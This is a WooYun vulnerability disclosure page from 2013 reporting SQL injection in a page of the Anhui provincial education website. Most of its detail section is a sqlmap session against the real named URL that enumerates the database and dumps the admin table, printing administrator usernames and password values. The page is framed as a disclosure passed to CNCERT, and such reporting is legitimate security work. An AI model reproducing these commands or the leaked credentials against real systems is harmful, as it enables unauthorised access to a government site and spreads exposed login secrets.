当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046866

漏洞标题:安徽教育网sql注射

相关厂商:安徽教育网

漏洞作者: 扬沙

提交时间:2013-12-24 17:58

修复时间:2014-02-07 17:59

公开时间:2014-02-07 17:59

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-24: 细节已通知厂商并且等待厂商处理中
2013-12-28: 厂商已经确认,细节仅向厂商公开
2014-01-07: 细节向核心白帽子及相关领域专家公开
2014-01-17: 细节向普通白帽子公开
2014-01-27: 细节向实习白帽子公开
2014-02-07: 细节向公众公开

简要描述:

详细说明:

注入点 http://www1.ahedu.gov.cn/gxbys/show.asp?id=183'
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'Article_Id=183'' 中。
/gxbys/show.asp,行 10

漏洞证明:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www1.ahedu.gov.cn/gxbys/show.asp?id=183"
[02:12:36] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www1.ahedu.gov.cn/gxbys/show.asp?id=183" --tables
Database: Microsoft_Access_masterdb
[1 table]
+-------+
| admin |
+-------+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www1.ahedu.gov.cn/gxbys/show.asp?id=183" --columns
Database: Microsoft_Access_masterdb
Table: admin
[7 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| adminname | non-numeric |
| adminpass | numeric |
| article_id | numeric |
| class_id | numeric |
| dw | non-numeric |
| id | numeric |
| user_email | non-numeric |
+------------+-------------+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www1.ahedu.gov.cn/gxbys/show.asp?id=183" --dump -T admin -C "adminname,adminpass"
Database: Microsoft_Access_masterdb
Table: admin
[2 entries]
+----+----------+------------+----+-----------+-----------+------------+
| id | class_id | article_id | dw | adminname | adminpass | user_email |
+----+----------+------------+----+-----------+-----------+------------+
| 1 | 1 | 183 | <blank> | admin | 5205265 | <blank> |
| 2 | 1 | 183 | <blank> | xxzx | 2166787 | <blank> |
+----+----------+------------+----+-----------+-----------+------------+

修复方案:

你们比我懂

版权声明:转载请注明来源 扬沙@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-28 22:48

厂商回复:

最新状态:

暂无